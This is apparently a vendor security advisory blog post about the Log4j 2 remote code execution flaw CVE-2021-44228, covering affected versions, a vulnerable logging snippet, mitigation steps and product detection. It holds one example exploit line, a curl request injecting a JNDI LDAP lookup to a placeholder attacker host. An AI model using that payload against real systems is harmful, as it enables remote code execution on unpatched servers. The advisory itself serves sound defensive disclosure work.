[Urgent] Apache Log4j 2 Vulnerability (CVE-2021-44228), Update Recommended

The Apache Log4j 2 vulnerability (CVE-2021-44228) was revealed on Twitter and Github alongside POC on December 10th, 2021. It is the remote code execution (RCE) vulnerability of the Log4j software, which can include the remote Java object address in the log message and run it in the vulnerable server. Alibaba’s cloud security team first reported the vulnerability to the Apache Software Foundation on November 24th, 2021, and the first patch was distributed on December 6th, 2021.

1. Vulnerability Targets and Versions

The products that fall under the following condition are affected by the vulnerability.

  • All versions of Apache Log4j 2.0-beta9 to 2.14.1

2. Method for Vulnerability Exploitation

If a service using Log4j includes a code that records strings sent to the user-agent as logs, the following exploitations can occur.

[Part of server source code]

static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.<em>class</em>.getName());
...
String userAgent = he.getRequestHeader("user-agent");    
String response = "<h1>Hello There, " + userAgent + "!</h1>";
log.error("Request User Agent:{}", userAgent);
...

[Vulnerability Exploitation]

An attack that automatically executes the Java object located in xxx.xxx.xxx.xxx/a from the server
ex) # curl 127.0.0.1:8080 -H ‘X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}’

3. Response to Vulnerability

1) Patch recommended for all versions from Log4j 2.0-beta9 to 2.14.1

2) Method for mitigating vulnerability if difficult to apply Log4j patch (See ATIP Security Recommendations)

  • Version: 2.0-beta9 – 2.10.0
    Remove the JndiLookup class as shown below.
    # zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

  •  Version: 2.10 – 2.14.1
    Change the value of the system property log4j2.formatMsgNoLookups or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to TRUE

4. AhnLab Products Response Status

AhnLab can detect the vulnerability with TG/IPX, AIPS, and HIPS products.

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Reference 1) https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389
Reference 2) https://atip.ahnlab.com/ti/contents/security-advisory?i=0a053796-66db-4ce0-9c30-d3c19060670e

The post [Urgent] Apache Log4j 2 Vulnerability (CVE-2021-44228), Update Recommended appeared first on ASEC BLOG.

Article Link: [Alert] Apache Log4j 2 Vulnerability (CVE-2021-44228), Update Recommended - ASEC BLOG